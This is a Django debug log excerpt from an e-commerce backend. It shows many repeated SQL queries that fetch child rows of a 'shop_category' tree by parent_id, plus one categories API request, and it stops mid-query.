14:22:40,310 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:22:40,314 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:22:40,321 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:22:40,325 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:22:40,328 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:22:40,332 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:22:40,336 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:22:40,340 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:22:40,346 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:22:40,350 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:22:40,354 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:22:40,358 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:22:40,363 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:22:40,369 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:22:40,373 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:22:40,377 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:22:40,381 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:22:40,385 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:22:40,392 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:22:40,398 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:22:40,402 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:22:40,406 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:22:40,410 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:22:40,414 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:22:40,420 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:22:40,424 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:22:40,428 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:22:40,433 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:22:40,437 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:22:40] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-13 14:22:43,853 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:22:43,862 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:22:43,867 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:22:43,870 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:22:43,878 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:22:43,882 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:22:43,887 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:22:43,890 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:22:43,895 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 14:22:43,901 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:22:43,905 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:22:43,911 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:22:43,917 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:22:43,923 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:22:43,929 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:22:43,932 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:22:43,936 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:22:43,941 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:22:43,944 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:22:43,950 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:22:43,953 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:22:43,957 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:22:43,960 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:22:43,963 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:22:43,968 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:22:43,974 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:22:43,977 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:22:43,981 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:22:43,984 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:22:43,988 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:22:43,993 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:22:43,997 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:22:44,001 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:22:44,006 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:22:44,009 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:22:44,016 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:22:44,020 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:22:44,024 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:22:44,028 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 